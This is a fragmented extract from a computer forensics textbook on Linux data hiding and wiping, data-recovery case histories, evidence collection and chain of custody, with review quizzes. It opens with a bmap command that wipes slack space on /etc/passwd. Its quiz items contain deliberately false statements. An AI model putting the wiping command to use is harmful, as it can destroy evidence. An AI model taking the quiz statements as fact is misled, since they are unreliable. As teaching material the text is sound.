evil data is here

shows the data
# bmap —mode wipeslack /etc/passwd

cleans the slack space
...
Now let’s turn to discovering what is out there on the vast expanses
of the disk drive
...
Using a hex editor on the raw partition can sometimes shed
some light on the disk contents, but the process is extremely messy
...

Next, let’s briefly review how to prevent adversaries from finding private data
...
All but one can only be used to wipe files,
rather than empty disk space
...
Some do not work under certain circumstances or for specific filesystems
...
” If this condition is not met, no secure deletion will be performed (with no error message) [5]
...
The simple method is to use a standard Linux “dd” utility
...

2
...

4
...
Doing the same for
the /tmp partition might cause some applications to crash, so one must be cautious [5]
...

The important fact is that when empty space is wiped, slack space for all files remains intact
...

This section briefly touched upon hiding, finding, and destroying data on
Linux filesystems
...

Finally, let’s look at some disk and tape data-recovery case studies
...


CASE HISTORIES
If there is any data, anywhere on your disk or tape, it can be recovered
...

A Dog’s Dinner
Late one afternoon, customer service received a phone call from a distraught customer who required data recovery from a couple of diskettes
...
The customer was asked the nature of the problem and
eventually confessed that the diskettes had suffered some physical damage
...

The damage to the disk cases was severe, with large tooth marks evident on the
surface of the disks
...
All the files were successfully recovered and restored to the grateful customer
...
This was a
NetWare Server and RAID array in one large, very heavy metal box, containing 18
× 2
...

There were three failed drives amongst the remaining batch of eight drives
...
Using a database of drive components and technical knowledge, the system
administrator worked to correct the faults on the drives so he could take images
...
The total good sectors imaged that night was just under 88
million! The customer’s valuable data was safe
...
On contact with the system administrator, he finally mentioned that it had traveled in the cargo hold of a plane
...

Luckily for him, it had not been swipe-damaged by x-ray equipment at the airport
...
Following a successful headstack swap, the drive was
imaged and the system administrator found 112 bad sectors, of which he was finally
able to read only 86
...

Accounts Critical
It was Easter Saturday and the system administrator had a critical tape data loss that
another data-recovery company had failed to rectify
...
The tape was poorly recorded and had many areas where the recording had broken up
...
By 6 A
...
on Sunday, the system administra-

Data Recovery

211

tor was recovering data from seven DAT tapes and had extracted images of each of
the disks in the RAID
...
The areas of missing data were being reprocessed to attempt to extract additional data from the tapes
...
About 48 hours later, the system administrator was still working
on reading data from the damaged areas of the tapes
...

Sinking Ship
A seismic survey ship far away in a distant sea sent a system administrator an IBM
3590 tape
...
If the data could not
be recovered, they would have to send the ship back out to sea to repeat the tests—
a rather costly operation
...
The
40 kg monster is capable of storing 10 gigabyte of uncompressed data on a single
cartridge and transferring that data at up to 9 MB per second
...

Gaining control of these various systems, finding the undamaged data on the
tape, and then persuading the drive to read it was complex
...

All Flooded Out
A business continuity firm had a customer with a big problem
...
Sadly, a flood had filled the basement with water
and fine silt, and the engineers found that their archives and backups were soaked
through and the media was coated inside and out with a thin layer of sediment
...
Each tape was
extracted from its cartridge and installed in a special cleaning rig that removed any
sediment
...
After a few hours, the system administrator was able
to return the recovered files and folders on a total of 26 CD-ROMs; the engineers
were grateful for the return of their archives
...
Tropical Storm Allison visits the Texas Gulf coast and dumps
three feet of rain on the city
...
Their uninterruptible power
supply (UPS) system, network switches, and a portion of their direct access storage
devices (DASDs) are wiped out
...
They take weekly image copies, creating
dual copies concurrently so the second copy can be sent off-site
...
M
...
M
...
They run
the Check Assets function regularly to ensure that required assets are cataloged
...

Proof

Finally, when disaster strikes, XYZ springs into action, and the validity of their
preparations is proved
...
They initial
program load (IPL) their system and bring up the Recovery Manager interface
...
They
build the appropriate groups for their lost databases and build appropriate recovery JCL
...
Their data is restored without errors, their business
resumes quickly, and everyone lives happily ever after, all with minimal expense
and elapsed time
...

Backup has never really been the problem
...
Although data

Data Recovery

213

backups would seem to offer an effective shield against these threats, backups do
not always provide comprehensive data protection
...
What is more, individuals often fail to test the restore capabilities of their
backup media
...
Finally, even if backups are successful, they only contain data collected during the most recent backup session
...

Conclusions
Data backup and recovery has become the “killer application” of storage area
networking
...

SAN-based backup offers benefits such as higher availability, increased flexibility, improved reliability, lower cost, manageability, improved performance,
and increased scalability
...
Whether
your business is retail, health care, banking, manufacturing, public utility, government agency, or almost any other endeavor, one thing is common: your
users expect more and more from your systems
...
How
does this growth affect your daily management of the data? What challenges do
you face? If a problem occurs, how do you get your applications back to normal in the most efficient manner possible?
Some files (especially on Linux systems) can and should be recovered with very
little effort or time
...

Ultimately, your odds of getting anything useful from the grave (dead storage)
is often a question of personal diligence—how much is it worth to you? If it’s
important enough, it’s quite possibly there
...
Contrary to the popular belief
that it’s hard to recover information, it’s actually starting to appear that it’s very
hard to remove something even if you want to
...
Now that’s data persistence
...
You need to continue the examination, for you have simply scratched the surface
...
1 in Appendix F), the
computer forensics specialist (CFS) should adhere to the provisional list of actions
for data recovery
...
A number of these systems
have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Data recovery is the process by which mediocre trained engineers
evaluate and extract data from damaged media and return it in an intact format
...
True or False? Fortunately, there are very few specialized hardware and software companies that manufacture products for the centralized backup and
recovery of business-critical data
...
True or False? Operationally, ready, or mirrored data does guard against data
corruption and user error
...
True or False? One of the most critical data-management tasks involves recovering data in the event of a solution
...
True or False? Wiping the file means “securely” adding it from disk (unlike the
usual removal of file entries from directories), so that file restoration becomes
extremely expensive or impossible
...
The following are obstacles to backing up applications, except:
A
...
Network bandwidth
C
...
System throughput
E
...
There are three I/O bottlenecks commonly found in traditional backup schemes,
except for two:
A
...
The ability of the backup server to not accept data from multiple systems
simultaneously
C
...
The available throughput of the tape device(s) onto which the data is moved
E
...
Below, are three of many factors that affect backup, except:
A
...

B
...

C
...

D
...

E
...

4
...
The backup server
B
...
The network
D
...
The backup storage device (or devices)
5
...
E-commerce
B
...
Email
D
...
Multimedia document management
...
The fire safe where
they kept their backups had been left open that night after closing
...

How would the firm’s CFS team (CFST) go about investigating this case?
Case Project
Five fire-damaged UNIX server drives were literally shoveled out of the debris from
a large auto dealership fire
...
All financial data (inventory,
accounts payable and receivable, W-2s, customers and loan information) was destroyed
...
The attorney immediately needed all of the plaintiff company’s
emails and attachments over a six-month time frame meeting keyword and time
and date criteria
...
Emails and the system
were password protected and the passwords were not available
...


REFERENCES
[1] Gamradt, Derek, “Data Backup + Recovery,” StorNet, Corporate Headquarters, 7074 South Revere Parkway, Englewood, CO 80112, 2001
...
, Electronic Commerce: Online Ordering and Digital Money,
Charles River Media, Hingham, MA, 2001
...

[4] Vacca, John R
...

[5] Chuvakin, Anton, “Linux Data Hiding and Recovery” (© 2000–2004 Anton
Chuvakin), Edison, NJ/Long Island, NY
...
Electronic evidence
has none of the permanence that conventional evidence has, and it is even
more difficult to form into a coherent argument
...
Not
everything is covered here
...


E

No legal advice is given here—different regions have different legislation
...

This part of the chapter is not aimed at expert forensics analysts, as most of this
would be obvious to them
...
The simple reason for this is that there never is one
correct answer that will guide you through all investigations
...


WHY COLLECT EVIDENCE?
Electronic evidence can be very expensive to collect
...
So, why bother collecting

217

218

Computer Forensics, Second Edition

the evidence in the first place? There are two simple reasons: future prevention and
responsibility
...
It would be analogous to not fixing the lock on your door after someone broke in
...

Responsibility
There are two responsible parties after an attack: the attacker and the victim
...

The victim, on the other hand, has a responsibility to the community
...
The victim may also have a legal obligation to perform an
analysis of evidence collected, for instance if the attack on their system was part of
a larger attack
...
Both have their pros and cons
...
You also leave yourself open to
possible liability issues if the attacker launches further attacks at other systems from
your own network system
...
What you
choose to do should be based on the situation
...


OBSTACLES
Electronic crime is difficult to investigate and prosecute
...


Evidence Collection and Data Seizure

219

Add to this the fact that electronic records are extremely (and sometimes transparently) malleable and that electronic transactions currently have fewer limitations
than their paper-based counterparts and you get a collection nightmare
...

Any paper trail of computer records they may leave can be easily modified or destroyed, or may be only temporary
...

Because of this, even if the details of the transactions can be restored through
analysis, it is very difficult to tie the transaction to a person
...
Such information merely shows
that whoever did it either knew or could get past those identifiers
...
The best you can do is to follow the rules
of evidence collection and be as assiduous as possible
...
Without taking these into consideration, you may find that the
evidence you’ve spent several weeks and quite a bit of money collecting is useless
...

In electronic terms, this can be a log produced by an audit function—provided that
the log can be shown to be free from contamination
...
This type of evidence is
subject to the perceived reliability of the witness, but as long as the witness can be
considered reliable, testimonial evidence can be almost as powerful as real evidence
...

Hearsay
Hearsay is any evidence presented by a person who was not a direct witness
...
Hearsay is generally inadmissible in court and should be avoided
...
These relate to five properties
that evidence must have to be useful
...

2
...

4
...


Admissible
Authentic
Complete
Reliable
Believable

Admissible
Admissible is the most basic rule
...
Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except the cost is higher
...

You must be able to show that the evidence relates to the incident in a relevant way
...

You collect not only evidence that can prove the attacker’s actions, but also evidence that could prove their innocence
...
This is called exculpatory evidence and is an
important part of proving a case
...
Your evidence collection and analysis
procedures must not cast doubt on the evidence’s authenticity and veracity
...

There’s no point presenting a binary dump of process memory if the jury has no
idea what it all means
...
Using
the preceding five rules, you can derive some basic do’s and don’ts:

Evidence Collection and Data Seizure

221

Minimize handling and corruption of original data
...

Comply with the five rules of evidence
...

Follow your local security policy
...

Be prepared to testify
...

Proceed from volatile to persistent evidence
...

Don’t run any programs on the affected system
...
Always handle secondary copies
...
You should make sure you don’t
run any programs that modify the access times of all files (such as tar and xcopy)
...

Account for Any Changes and Keep Detailed Logs of Your Actions
Sometimes evidence alteration is unavoidable
...
Any
changes at all should be accounted for—not only data alteration but also physical
alteration of the originals (the removal of hardware components)
...
If you don’t follow them, you are probably
wasting your time and money
...

Do Not Exceed Your Knowledge
If you don’t understand what you are doing, you can’t account for any changes you
make and you can’t describe what exactly you did
...
Never soldier on regardless
...


222

Computer Forensics, Second Edition

Follow Your Local Security Policy
If you fail to comply with your company’s security policy, you may find yourself
with some difficulties
...
If in doubt, talk to those who know
...
Differences between the original system and the master
copy count as a change to the data
...

Be Prepared to Testify
If you’re not willing to testify to the evidence you have collected, you might as well
stop before you start
...
Remember that you may need to testify at a
later time
...
This also means that your plan of action shouldn’t be based
on trial-and-error
...
Volatile evidence may
vanish entirely if you don’t collect it in time
...

You must still collect accurate data
...
Automation of certain tasks makes collection proceed even faster
...
Because
of this, you should always try to collect the most volatile evidence first
...
Not
only do you lose any volatile evidence, but also the attacker may have trojaned (via
a trojan horse) the startup and shutdown scripts, plug-and-play devices may alter
the system configuration, and temporary file systems may be wiped out
...
As a general rule, until the compromised disk is finished with and restored, it should never be used as a boot disk
...
Any programs you use should be on read-only media (such as a
CD-ROM or a write-protected floppy disk) and should be statically linked
...
Some evidence resides in
storage that requires a consistent power supply; other evidence may be stored in information that is continuously changing [1]
...
Of course, you should still
take the individual circumstances into account
...

To determine what evidence to collect first, you should draw up an order of
volatility—a list of evidence sources ordered by relative volatility
...

2
...

4
...

6
...

8
...

10
...


224

Computer Forensics, Second Edition

GENERAL PROCEDURE
When collecting and analyzing evidence, there is a general four-step procedure you
should follow
...
You should customize the details to suit your situation
...
For this purpose,
you should know what the data is, where it is located, and how it is stored
...

Preservation of Evidence
The evidence you find must be preserved as close as possible to its original state
...

Analysis of Evidence
The stored evidence must then be analyzed to extract the relevant information and
recreate the chain of events
...
Always be sure that the person or people who are analyzing the evidence are fully qualified to do so
...
The manner of presentation is important, and it must be
understandable by a layman to be effective
...
A good presenter can help in this respect
...
Storage of that
data is also important, as it can affect how the data is perceived
...
It is important to keep these
logs secure and to back them up periodically
...
Remember, if the logs are kept locally on the compromised machine, they are susceptible
to either alteration or deletion by an attacker
...

Regular auditing and accounting of your system is useful not only for detecting
intruders but also as a form of evidence
...
Of course, you need a clean snapshot for
these to work, so there’s no use trying it after the compromise
...

Monitoring logs as they are created can often show you important information you
might have missed had you seen them separately
...

Information gathered while monitoring network traffic can be compiled into
statistics to define normal behavior for your system
...
You can also monitor the actions of your
users
...
Unusual activity or the
sudden appearance of unknown users should be considered definite cause for closer
inspection
...
There are
plenty of laws you could inadvertently break
...
You should also display a disclaimer stating what
monitoring is done when users log on
...


METHODS OF COLLECTION
There are two basic forms of collection: freezing the scene and honeypotting
...
You can collect frozen information after or during any
honeypotting
...
The necessary authorities should be notified (the police and your incident response and legal teams), but you shouldn’t go out and tell the world just yet
...
Make sure the programs and utilities used to collect the
data are also collected onto the same media as the data
...

Honeypotting is the process of creating a replica system and luring the attacker
into it for further monitoring
...
The placement of misleading information and the
attacker’s response to it is a good method for determining the attacker’s motives
...
Honeypotting and sandboxing are extremely resource intensive, so they
may be infeasible to perform
...
As previously mentioned, you should consult your lawyers
...
These are known as artifacts
...
You should never attempt to analyze
an artifact on the compromised system
...

Artifacts may be difficult to find; trojaned programs may be identical in all obvious ways to the originals (file size, medium access control [MAC] times, etc
...
If you are performing regular file integrity assessments, this
shouldn’t be a problem
...


COLLECTION STEPS
You now have enough information to build a step-by-step guide for the collection
of the evidence
...
You should customize it to your
specific situation
...
Find the evidence
...
Find the relevant data
...

4
...

6
...

Remove external avenues of change
...

Document everything
...
Use a checklist
...

Find the Relevant Data
Once you’ve found the evidence, you must figure out what part of it is relevant to
the case
...
Don’t spend hours collecting information that
is obviously useless
...
The order of volatility for your system is a good guide and ensures that
you minimize loss of uncorrupted evidence
...
Preventing anyone from tampering with the evidence helps
you create as exact an image as possible
...
The attacker may have been smart and left a dead-man switch
...

Collect the Evidence
You can now start to collect the evidence using the appropriate tools for the job
...
You may find that you
missed something important
...

Document Everything
Your collection procedures may be questioned later, so it is important that you
document everything you do
...
Don’t leave anything out
...
Originals should never be used in forensic examination; verified duplicates should be
used
...
Of course, any
tests done should be done on a clean, isolated host machine
...

A good way of ensuring that data remains uncorrupted is to keep a chain of
custody
...
Remember that this will be questioned later on, so document everything (who found the data, when and where it was transported [and how], who had
access to it, and what they did with it)
...

Analysis
Once the data has been successfully collected, it must be analyzed to extract the evidence you wish to present and to rebuild what actually happened
...
Your work will be
questioned and you must be able to show that your results are consistently obtainable from the procedures you performed
...
This can be particularly difficult when it comes to computers
...
One thing to remember is to never, ever change the clock on an affected
system
...

Log files usually use timestamps to indicate when an entry was added, and
these must be synchronized to make sense
...
You’re
not just reconstructing events, you yourself are making a chain of events that must
be accounted for as well
...
The incident may involve other time zones than your own, so using a
common reference point can make things much easier
...
This examination host should be secure, clean (a fresh, hardened install of the operating system is a

Evidence Collection and Data Seizure

229

good idea), and isolated from any network
...

Once this system is available, you can commence analysis of the backups
...
You can simply restore the backups again if required
...
Ensure
that what you do is repeatable and capable of always giving the same results
...
You must correlate all the
evidence you have gathered (which is why accurate timestamps are critical), so it’s
probably best to use graphical tools, diagrams, and spreadsheets
...

You may miss something if you leave a piece of evidence out
...
There
are many complexities you must consider, and you must always be able to justify
your actions
...
The right tools and knowledge of
how everything works is all you need to gather the evidence required
...
Operating systems are hardened, firewalls are
installed, intrusion detection systems are put in place, honeypots are implemented,
security policies and procedures are established, security awareness programs are
rolled out, and systems are monitored
...
When unauthorized access does occur, the last line of defense is legal action
against the intruder
...
It is important to remember one of the
basic rules of our legal system: if there is no evidence of a crime, there is no crime
in the eyes of the law
...

Some of the most common reasons for improper evidence collection are poorly
written policies, lack of an established incident response plan, lack of incident response training, and a broken chain of custody
...

Conclusions
Admissible is the most basic rule (the evidence must be able to be used in court
or otherwise)
...

It’s not enough to collect evidence that just shows one perspective of the incident
...

Your evidence collection and analysis procedures must not cast doubt on the
evidence’s authenticity and veracity
...

There are six fundamental rules to guide an investigator during a search and
seizure
...
In
other words, the rules help ensure an investigation’s chain of custody, which is
critical to the success of any case
...
Without these activities, the chain of custody is put at
great risk
...

Crime scene security may range from locking doors to (for law enforcers)
arresting trespassers
...

The search for evidence can involve looking in a variety of places, but the legalities of searching must always be considered
...


An Agenda for Action
When completing the Evidence Collection and Data Seizure Checklist (Table F6
...
The order is not

Evidence Collection and Data Seizure

231

significant; however, these are the activities for which the researcher would want to
provide a detailed description of procedures, review, and assessment for ease of use
and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...
The
processes are strict and exhaustive, the systems affected may be unavailable for
regular use for a long period of time, and analysis of the data collected must be
performed
...
True or False? Once a compromise has been detected, you have two options:
pull the system off the network and begin collecting evidence or leave it offline
and attempt to monitor the intruder
...
Make sure you always document the following points, except::
A
...
Who took possession of it
C
...
How it was stored and unprotected
E
...
Make sure you always label any hardware with the following, except:
A
...
A case number

232

Computer Forensics, Second Edition

C
...
The time and date you got the evidence
E
...
There are five rules of collecting electronic evidence
...
Unadmissible
B
...
Complete
D
...
Believable
4
...
Minimize handling/corruption of original data
B
...
Comply with the six rules of evidence
D
...
Follow your local security policy
5
...
An example
of an order of volatility would be the following, except:
A
...
Routing tables
C
...
Process table
E
...
Why would
a CFS be called in to solve a teenage runaway case? What would his role be here?

HANDS-ON PROJECTS
A parent was concerned that her son was accessing pornographic Web sites from
his computer
...
How would a CFS go about investigating this incident?

Evidence Collection and Data Seizure

233

Case Project
An adult roommate was accused of using another’s computer to make unauthorized purchases on a popular Internet shopping site
...
S
...
The
former employee filed a lawsuit accusing her superiors at the company of sexual
harassment and wrongful termination
...


REFERENCES
[1] Vacca, John R
...

[2] Braid, Matthew, “Collecting Electronic Evidence After a System Compromise,” Australian Computer Emergency Response Team (AusCERT), The
University of Queensland, Qld 4072 Australia (SANS Institute, 5401 Westbard Ave
...


This page intentionally left blank

7

Duplication and
Preservation of
Digital Evidence

omputer evidence is odd, to say the least
...
Two of these
levels are not visible to the computer user
...
Electromagnets and planted destructive trojan horse programs are other
hazards that can permanently destroy computer evidence within seconds
...
In the old days, defense lawyers didn’t know much
about computer evidence
...
However, things are changing because
lawyers are becoming educated because of the current popularity of electronic
document discovery in the legal community
...

Nevertheless, computer forensic evidence is frequently challenged in court
...
There’s also some confusion over the legal classification
of computer evidence
...
The complexity of the criminal law means that the overwhelming majority of cases do not
make it to civil or criminal court, but should [1]
...
Authentication
2
...
Exceptions to the hearsay rule [1]
Authentication means showing a true copy of the original; best evidence means
presenting the original; and the allowable exceptions are when a confession or business or official records are involved
...
Some say documentation (of what has been
done); others say preservation (the integrity of the original); still others say authenticity (the evidence being what you say it is)
...

If your documentation is poor, it will look like your processing procedures
were poor, and when you testify in court, you will look ridiculous since you have no
good written record to refresh your memory
...
In general, the condition of all evidence has to be documented
...
Then, the
laboratory worker (forensic scientist or criminalist) figures out what tests are appropriate, decides on what part of the evidence to examine first, dissects or copies
the part to be tested (specimen = dissection; exemplar = copying), and prepares the
testing ground, all the while documenting each decision step
...

If your preservation is poor, it becomes fairly evident that your collection and
transportation of evidence gives rise to numerous possibilities for error in the form of
destruction, mishandling, and contamination
...
The basic chain of
custody, for example, involves at least three initial sources of error
...
Once it gets to the lab, it
has to be logged in, assigned an identification number, placed in storage, and kept
from intermingling with other evidence
...
Some workplaces are required to meet the standards of professional accrediting organizations
...
The quality assurance
policy, for example, must act as a check on quality control
...

If your authenticity is poor, then you, your agency, and the prosecutor will look
like inexperienced rookies, not so much foolish, but like rank amateurs who can’t

Duplication and Preservation of Digital Evidence

237

explain, for example, how an “MD5 Hash algorithm” works
...
The old common law standard is oculis subjecta
fidelibus, as it is for any piece of demonstrative evidence (like a plaster cast model;
if the scale is 1:10, an average person ought to be able to visualize the larger thing
to scale)
...
Only the Marx standard resembles the old common law standard, and it’s only found in a handful of jurisdictions
...

Frye standard (Frye v
...
S
...
This is a “general acceptance” test
...
State, 1968): The court allows a novel test or
piece of new, sometimes controversial, science on a particular problem at hand
if an adequate foundation can be laid, even if the profession as a whole isn’t familiar with it
...
Marx, 1975): The court is satisfied that it did not have to
sacrifice its common sense in understanding and evaluating the scientific expertise put before it
...

Daubert standard (Daubert v
...

The federal courts were the first to recognize that files on computers were similar, but unlike, files kept on paper
...
Therefore, a modern clause exists in the
Federal Rules of Evidence (FRE 1001-3) that states, If data are stored by computer
or similar device, any printout or other output readable by sight, shown to reflect
the data accurately, is an original [1]
...
The history of computers in the
courtroom ties in with demonstrative standards, and computer forensics, after all, is
about reconstructing the crime, or criminalistics
...
Digital evidence is the most
easily lost evidence
...
You need to be able to demonstrate that the evidence is what you
say it is, came from where you say it did, and has not been modified in any way since
you obtained it
...
It’s futile to talk about any one correct way to do
it, or any perfect printout
...

Now let’s look at some of the emerging principles of duplication and preservation of digital evidence collection and handling
...


PRESERVING THE DIGITAL CRIME SCENE
The computer investigator not only needs to be worried about destructive process
and devices being planted by the computer owner, he or she also needs to be concerned about the operating system of the computer and applications
...
Unfortunately potential evidence can also reside in file slack, erased files, and
the Windows swap file
...
When Windows starts, it potentially creates
new files and opens existing ones as a normal process
...
Furthermore, all of the Windows operating systems
(Windows 2000, XP and especially 2003) have a habit of updating directory entries
for files as a normal operating process
...

Another concern of the computer investigator is the running of any programs
on the subject computer
...
Perpetrators could modify the operating system such that the execution of the DIR
command destroys simulated evidence
...

Even trusted word processing programs such as Microsoft Word and WordPerfectTM can become the enemy of the cyber cop
...
These files overwrite the temporary files that existed previously, and
potential evidence stored in those files can be lost forever
...
Computer evidence processing is risky business and is fraught with potential
problems
...
What will your answer be if the defense
attorney claims the data you destroyed proved the innocence of his or her client?
You had better have a good answer
...
The objective of this
section is to keep Murphy’s law from ruining your case
...
He stands
ready to strike at just the wrong moment
...
This
should normally be done before the computer is operated
...
These basic rules of evidence never change
...
As stated previously, evidence can reside at multiple levels and in bizarre storage locations
...
It is not enough to do a standard backup of a hard
disk drive
...

Without backing up evidence in these unique areas, the evidence is susceptible to
damage and modification by the computer investigator
...
They involve copying of every bit of
data on a storage device, and it is recommended that two such copies be made of
the original when hard disk drives are involved
...
As previously recommended, the original evidence should be preserved at all costs
...

The importance of bit stream image backups cannot be stressed enough
...
The basic rule is that only on rare occasions
should you process computer evidence without first making an image backup
...

To avoid getting too technical for the purposes of this chapter, specifics regarding the uses of these backup programs will be avoided
...
Ideally, you should conduct tests on your own computers beforehand and
compare the results with the original computer evidence
...
Know
your tools
...
You may only get one chance to do it right
...
Even the normal operation
of the computer can destroy computer evidence that might be lurking in unallocated space, file slack, or in the Windows swap file
...
Every case is
different, and flexibility on the part of the computer investigator is important
...
Remember that these do not represent the only true way of processing computer evidence
...

2
...

4
...

6
...

8
...

10
...

12
...

14
...

16
...

Document the hardware configuration of the system
...

Make bit stream backups of hard disks and floppy disks
...

Document the system date and time
...

Evaluate the Windows swap file
...

Evaluate unallocated space (erased files)
...

Document file names, dates, and times
...

Evaluate program functionality
...

Retain copies of software used [2]
...


EMERGENCY GUIDELINES
The popularity of desktop and notebook computers has come with a mixed blessing
...
However, they
also provide opportunities for abuse of corporate policies and the commission of
computer-related crimes
...
Embezzlements using computers have become commonplace in small- and medium-size businesses
...
They can
also be used to find and document evidence in a civil or criminal case
...
As a result, it is important that
things are done correctly as soon as a computer incident is identified
...
Don’t turn on or operate the subject computer
...
Don’t solicit the assistance of the resident “computer expert
...
Don’t evaluate employee email unless corporate policy allows it
...


D ON ’ T T URN O N

OR

O PERATE

THE

S UBJECT C OMPUTER

The computer should first be backed up using bit stream backup software
...
Internet activity and fragments of Windows work sessions exist in the
Windows swap file
...
For that matter, the same is true of a Windows system
...


D ON ’ T S OLICIT THE A SSISTANCE OF
THE R ESIDENT C OMPUTER E XPERT
The processing of computer evidence is tricky to say the least
...
Like any other
science, computer science has its areas of specialty
...
In some cases, valuable evidence is lost or the evidence is so tainted that it
loses its evidentiary value
...
Do this
before you turn on the computer
...
If
your corporate policy specifically states that all computers and data stored on them
belongs to the corporation, then you are probably on safe ground
...
Furthermore, it is always a good idea to check with corporate counsel
...
To do otherwise could subject you and your corporation to a lawsuit [4]
...
At the option of the computer investigator, pictures of the
screen image can be taken
...
These can be in memory or available through a connected modem
...
This
can complicate the shutdown of the computer
...

Document the Hardware Configuration of the System
It is assumed that the computer system will be moved to a secure location where a
proper chain of custody can be maintained and evidence processing can begin
...
Labeling each wire is also important, so that it can easily be reconnected when the system configuration is restored to its original condition at a secure location
...
War stories can be told about this one that relate to both law
enforcement agencies and corporations
...

All too often, individuals operate seized computers without knowing that they

Duplication and Preservation of Digital Evidence

243

are destroying potential evidence and the chain of custody
...
Evidence can be
planted on it and crucial evidence can be intentionally destroyed
...
Lacking a
proper chain of custody, how can you say that relevant evidence was not planted
on the computer after the seizure? The answer is that you cannot
...

Make Bit Stream Backups of Hard Disks and Floppy Disks
The computer should not be operated, and computer evidence should not be
processed until bit stream backups have been made of all hard disk drives and floppy
disks
...
The original evidence should be left untouched unless compelling circumstances exist
...
It is fragile and can easily be altered or destroyed
...
Bit stream backups are much like an insurance policy and are essential for any serious computer evidence processing
...
Such proof will help you rebut allegations
that you changed or altered the original evidence
...
Mathematically, a 32-bit validation is accurate to approximately one in 4
...
However, given the speed of today’s computers and the vast amount of storage capacity on today’s computer hard disk drives, this level of accuracy is no longer
accurate enough
...

Document the System Date and Time
The dates and times associated with computer files can be extremely important
from an evidence standpoint
...
If the system clock is one hour slow because of daylight-savings time,
then file timestamps will also reflect the wrong time
...

Make a List of Key Search Words
Because modern hard disk drives are so voluminous, it is all but impossible for a
computer specialist to manually view and evaluate every file on a computer hard

244

Computer Forensics, Second Edition

disk drive
...
Usually some information is known
about the allegations, the computer user, and the alleged associates who may be involved
...
Such keywords can be used in the
search of all computer hard disk drives and floppy diskettes using automated software
...
In such cases, the
words should be surrounded with spaces
...
In
the past, this tedious task was done with hex editors, and it took days to evaluate just one Windows swap file
...
When Windows 2000, XP, and 2003 are involved,
the swap file may be set to be dynamically created as the computer is operated
...
However, all is not lost, because the content of the swap file can easily be
captured and evaluated
...
It is
a source of significant security leakage and consists of raw memory dumps that
occur during the work session as files are closed
...
Specialized forensic tools are required to view and evaluate the file
slack; file slack can provide a wealth of information and investigative leads
...

On a well-used hard disk drive, as much as 1
...
File slack should be evaluated for relevant keywords
to supplement the keywords identified in the previous steps
...
Because of the
nature of file slack, specialized and automated forensic tools are required for evaluation
...
Tests suggest that file
slack provides approximately 80 times more Internet leads than the Windows swap
file
...


Duplication and Preservation of Digital Evidence

245

Evaluate Unallocated Space (Erased Files)
On a well-used hard disk drive, billions of bytes of storage space may contain data
associated with previously erased files
...

Such keywords should be added to the computer investigator’s list of keywords for
use in the next processing step
...
Unallocated space is typically a good source of data that was previously associated with word processing temporary files and other temporary files
created by various computer applications
...
Several forensic
text search utilities are available in the marketplace
...

It is important to review the output of the text search utility and equally important to document relevant findings
...
When new keywords are identified, they should be added to the
list, and a new search should be conducted using the text search utility
...

Document File Names, Dates, and Times
From an evidence standpoint, file names, creation dates, and last modified dates
and times can be relevant
...
The file should be sorted based on the file name, file size, file content,
creation date, and last modified date and time
...
The output should be in the form of a wordprocessing-compatible file that can be used to help document computer evidence
issues tied to specific files
...
As a result,
text data stored in these file formats cannot be identified by a text search program
...
Depending on the type of file involved, the contents should
be viewed and evaluated for its potential as evidence
...
When
hidden partitions are found, they should be evaluated for evidence and their existence should be documented
...
The Recycle Bin is
the repository of files selected for deletion by the computer user
...
If relevant files are found, the issues involved should be documented
thoroughly
...
When destructive processes that are tied to relevant evidence are discovered, this can be used to prove willfulness
...

Document Your Findings
As indicated in the preceding steps, it is important to document your findings as issues are identified and as evidence is found
...
Be sure you are legally licensed to use the forensic software
...
Smart
defense lawyers will usually question software licensing; you don’t want to testify
that you used unlicensed software in the processing of computer evidence
...

When appropriate, mention in your documentation that you are licensed to use
the forensic software involved
...

Retain Copies of Software Used
Finally, as part of your documentation process, it is recommended that a copy of the
software used be included with the output of the forensic tool involved
...
When this documentation methodology is followed, it eliminates confusion (about which version of the software was used to create the output)
at trial time
...
Duplication of results can be difficult or impossible to achieve if the software has been upgraded and the original version used was not retained
...


LEGAL ASPECTS OF COLLECTING AND PRESERVING COMPUTER
FORENSIC EVIDENCE
Some of the most common reasons for improper evidence collection are poorly
written policies, lack of an established incident response plan, lack of incident response training, and a broken chain of custody
...
The remainder of this chapter focuses on the procedure a
private organization should follow in collecting computer forensic evidence to
maintain chain of custody
...
Establishing a clear chain of custody is crucial because electronic evidence can be
easily altered
...
Preserving a chain of custody for electronic evidence, at a minimum,
requires proving that:
No information has been added or changed
...

A reliable copying process was used
...


Proving this chain is unbroken is a prosecutor’s primary tool in authenticating
electronic evidence
...
These legal requirements are vast, complex, and vary from country to country
...
U
...

Code Title 28, Section 1732 provides that log files are admissible as evidence if they
are collected in the regular course of business
...
This means you’d be much safer to log everything all the time and deal with
the storage issues than to turn on logging only after an incident is suspected
...

Another factor in the admissibility of log files is the ability to prove that they
have not been subject to tampering
...
Other protective measures include, but are not limited to, storing logs on a dedicated logging server and encrypting log files
...
Therefore, due
diligence should be applied in protecting them
...
A key to establishing that a user has no right to privacy when
using corporate networks or computer systems is the implementation of a log-on
banner
...
Individuals using this computer
system without authority, or in excess of their authority, are subject to having all
of their activities on this system monitored and recorded by system personnel
...

Anyone using this system expressly consents to such monitoring and is advised
that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement officials
...
The Supreme Court ruling in O’Connor v
...
S
...
To prove that the policy has
been communicated, employees should sign a statement indicating that they have
read, understood, and agreed to comply with corporate policy and consent to system monitoring
...
Tensions will probably be high and people will want to find answers as quickly as possible
...

The investigation team will need to bring certain tools with them to the incident site
...
Depending on the type of incident and whether the team will be able to retrieve an entire system or just the data,
they may also need to bring tools to produce reliable copies of electronic evidence,
including media to use in the copying process
...
If this is something
your legal counsel wants as part of the evidence, then also include a Polaroid camera in the list of tools
...

When an incident is reported, this individual will contact the other members of the
response team as outlined in the Incident Response Policy
...
The incident coordinator will also assign
team members the various tasks outlined in the incident-handling procedure and
will serve as the liaison to the legal team, law enforcement officials, management,
and public relations personnel
...

One team member will be assigned the task of maintaining the evidence notebook
...
At a minimum, items to be recorded in the notebook include
Who initially reported the suspected incident along with time, date, and circumstances surrounding the suspected incident
...

Names of all persons conducting the investigation
...

Reasons for the investigation
...
Also include identification tag numbers assigned to
the systems or individual parts of the system
...

Applications running on the computer systems previously listed
...

